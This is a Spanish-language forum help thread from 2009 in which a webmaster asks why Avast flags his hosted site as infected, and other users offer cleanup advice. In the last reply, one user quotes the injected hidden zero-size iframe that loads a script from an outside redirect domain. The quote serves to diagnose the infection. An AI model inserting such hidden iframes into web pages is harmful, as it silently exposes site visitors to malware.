·
miarroba.com
Virus en el sitio
 
Índice de subforos · Comunidades de foros · Foros - Ayuda para usuarios
Foros · Noticias · Buscar · Usuarios · Fisgona
Mensaje Autor 
#1 ·
Virus en el sitio

Tengo un virus en el sitio que solo lo detecta el Avast. Escaneo mi pc y no tengo nada, borro todo del sitio, vuelvo a ftpearlo, y se puede visitar bien, no encuentra nada y al rato o el dia siguiente aparece de nuevo que el sitio tiene virus. El Avast dice:

Archivo: http://cienciaylabor.webcindario.com/{gzip}

Malware: HTML-Illframe-C[Trj]

por favor si me pueden ayudar ya que sino no va a enrtar mas nadie a mi sitio...mil gracias y saludos

 

 


fabito_mailfabito_mail
Usuario Novato
Usuario Novato

Mensajes: 7
Desde: 08/Oct/2009
08/Oct/2009 12:58 GMT+1
#2 ·
RE: Virus en el sitio

el virus esta en tu pc, seguro.

existe un monton de sitios donde te van a guiar para eliminar con efectividad, por ejemmplo en foros spyware, aunque te recomiendo los siguientes pasos.

Agenciate un buen antivirus (el avast es valido)

Un antiespias, spyboot por ejemplo o adware, u otros similares.

Pasalo todo, y limpia. Reinicia. Si sigue estando, desactiva restaurar sistema. Y repite operacion. Si se mantine, agenciate una herramienta particular y especifica, como malwarebytes, o htjis, para eliminarlo especificamente. Volver a barrer la casa con antiespias y antivirus...y teoricamente ya no debe estar. Activar de nuevo el restaurar sistema.

De todos modos consultalo en foros especificos si ves que te da mucho problema.



Antes de preguntar, utiliza el buscador, o busca en los mensajes con chincheta los tutoriales.


PaseanteDelForoPaseanteDelForo
Moderador
Moderador

Haz clic para ver el perfil del usuario

Usuario PRO Usuario PRO
Mensajes: 3.804
Desde: 10/May/2006
08/Oct/2009 13:36 GMT+1
#3 ·
RE: Virus en el sitio

mil gracias por tu respuesta, pero hice lo que me dijiste y sigue el virus.

 


fabito_mailfabito_mail
Usuario Novato
Usuario Novato

Mensajes: 7
Desde: 08/Oct/2009
12/Oct/2009 01:20 GMT+1
#4 ·
RE: Virus en el sitio

ah, el sitio es: www.cienciaylabor.webcindario.com y lo detecta el Avast.

Por favor si alguien puede ayudarme estaria muy agradecido.

 


fabito_mailfabito_mail
Usuario Novato
Usuario Novato

Mensajes: 7
Desde: 08/Oct/2009
12/Oct/2009 01:39 GMT+1
#5 ·
RE: Virus en el sitio

perdona pero me dice que la pagina no existe, cuando picho en el enlace....la has borrado?



Antes de preguntar, utiliza el buscador, o busca en los mensajes con chincheta los tutoriales.


PaseanteDelForoPaseanteDelForo
Moderador
Moderador

Haz clic para ver el perfil del usuario

Usuario PRO Usuario PRO
Mensajes: 3.804
Desde: 10/May/2006
12/Oct/2009 01:46 GMT+1
#6 ·
RE: Virus en el sitio

La web tiene index.html?


DJMatyX-B4nDJMatyX-B4n
Usuario habitual
Usuario habitual

Mensajes: 37
Desde: 09/Oct/2009
12/Oct/2009 10:25 GMT+1
#7 ·
RE: Virus en el sitio

Escrito originalmente por PaseanteDelForo

perdona pero me dice que la pagina no existe, cuando picho en el enlace....la has borrado?

es que no queria que ningun visitante se infectara....

ahi la subi de nuevo.....

si me podes ayudar te lo recontra agradeceria....saludos

 


fabito_mailfabito_mail
Usuario Novato
Usuario Novato

Mensajes: 7
Desde: 08/Oct/2009
13/Oct/2009 15:03 GMT+1
#8 ·
RE: Virus en el sitio

Escrito originalmente por DJMatyX-B4n

La web tiene index.html?

soy nuevo en esto, perdon si digo alguna burrada...la web la hice con front page...cuando la abro le doy doble click a index.htm

no se si te referias a eso....

si me podrias ayudar te estaria muy agradecido. Saludos,

 


fabito_mailfabito_mail
Usuario Novato
Usuario Novato

Mensajes: 7
Desde: 08/Oct/2009
13/Oct/2009 15:06 GMT+1
#9 ·
RE: Virus en el sitio

yo he entrado y no me salta nada..... solo esta subida una pagina ¿verdad?

que antivirus tienes? McFee por un casual?



Antes de preguntar, utiliza el buscador, o busca en los mensajes con chincheta los tutoriales.


PaseanteDelForoPaseanteDelForo
Moderador
Moderador

Haz clic para ver el perfil del usuario

Usuario PRO Usuario PRO
Mensajes: 3.804
Desde: 10/May/2006
13/Oct/2009 15:47 GMT+1
#10 ·
RE: Virus en el sitio

Escrito originalmente por PaseanteDelForo

yo he entrado y no me salta nada..... solo esta subida una pagina ¿verdad?

que antivirus tienes? McFee por un casual?

no, el unico que la detecta es el Avast...tengo otras compus con otros antivirus y no detecta nada...no se como arreglar este problema. Si me podes ayudar te agradeceria mucho.

 


fabito_mailfabito_mail
Usuario Novato
Usuario Novato

Mensajes: 7
Desde: 08/Oct/2009
14/Oct/2009 22:51 GMT+1
#11 ·
RE: Virus en el sitio



Antes de preguntar, utiliza el buscador, o busca en los mensajes con chincheta los tutoriales.


PaseanteDelForoPaseanteDelForo
Moderador
Moderador

Haz clic para ver el perfil del usuario

Usuario PRO Usuario PRO
Mensajes: 3.804
Desde: 10/May/2006
14/Oct/2009 23:29 GMT+1
#12 ·
RE: Virus en el sitio

Escrito originalmente por PaseanteDelForo


El tema es que el virus no esta en mi PC, esta en un volumen infectado del host. Copie la misma pagina, pero cambiandole una letra, y como seguramente se copio en otro volumen, la misma no tiene virus, por lo que confirma que el virus no esta en mi pc.

Por favor, necesito que alguien me ayude...la pagina estaba siendo de utilidad para muchos y ahora dejaron de entrar por temor a infectarse...

en la nueva cambie la "y" por "-".

www.cienciaylabor.webcindario.com  (MAL , INFECTADA)

www.ciencia-labor.webcindario.com (OK, sin problemas)

Gracias

 

 


fabito_mailfabito_mail
Usuario Novato
Usuario Novato

Mensajes: 7
Desde: 08/Oct/2009
05/Nov/2009 20:17 GMT+1
#13 ·
RE: Virus en el sitio

Aquello de un virus que solo detecta un antivirus es raro... yo uso ESET NOD32 y no me ha detectado nada.

Por otra parte dices que te detecta el Malware: HTML-Illframe-C[Trj], que parece indicar que se ha colado cuando se creo el html, concretamente en el index.html, que te metio

Código:
<iframe pvklf='0U2G5rHo' src='http://redirect-script.com/s/in.cgi?7 ' xexpk='NvXEwVRS' width='0' height='0' sty

Si entramos manualmente a http://redirect-script.com/ sale

Cita:

This account has been suspended.
Either the domain has been overused, or the reseller ran out of resources.

Y si entramos a http://redirect-script.com/s/in.cgi?7si vemos como esa web no sale.

Código:
<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://google.com'">
</head>
<body>
document moved <a href="http://google.com">here</a>
</body>
</html>

Que efectivamente te lleva a Google.

Así mismo, el host es un servidor Linux, aunque no sea inmune a los virus y tal, es raro... además es raro que no se infecten otras webs en el mismo servidor... por lo que me centro en problema en tu PC.

 

 




Editado por NoSetup.orgNoSetup.org, Jueves, 5 de Noviembre de 2009, 20:31
NoSetup.orgNoSetup.org
@man / @woman
@man / @woman

Haz clic para ver el perfil del usuario

Usuario PRO Usuario PRO
Mensajes: 26.961
Desde: 01/Mar/2003
05/Nov/2009 20:26 GMT+1
Índice de subforos · Comunidades de foros · Foros - Ayuda para usuarios
Temas similares
Asunto Autor#VisitasÚltima respuesta
Como logro darle comercio a mi sitio web16/Dic/2009, 21:20
luis.cuadraluis.cuadra
05No hay respuestas
no puedo ingresar a administrar mi sitio27/Ene/2009, 05:32
hoanquihoanqui
114427/Ene/2009, 06:55
GestionXlsGestionXls Ir al último mensaje del tema
Opciones:
Versión imprimible del tema
Subscríbete a este tema
Date de baja de este tema
Ir al subforo:  

TU NO PUEDES Escribir nuevos temas en este foro
TU NO PUEDES Responder a los temas en este foro
TU NO PUEDES Editar tus propios mensajes en este foro
TU NO PUEDES Borrar tus propios mensajes en este foro
Todas las fechas y horas son GMT+1. Ahora son las 18:16
Miarroba Networks, S.L. C/ 18 de Julio, 21 Bajo, 39610 Astillero (CANTABRIA) - CIF B-39512736
Inscrita en el Registro Mercantil de Cantabria, tomo 743, folio 161, libro 0, hoja S-12428, Inscripción 1ª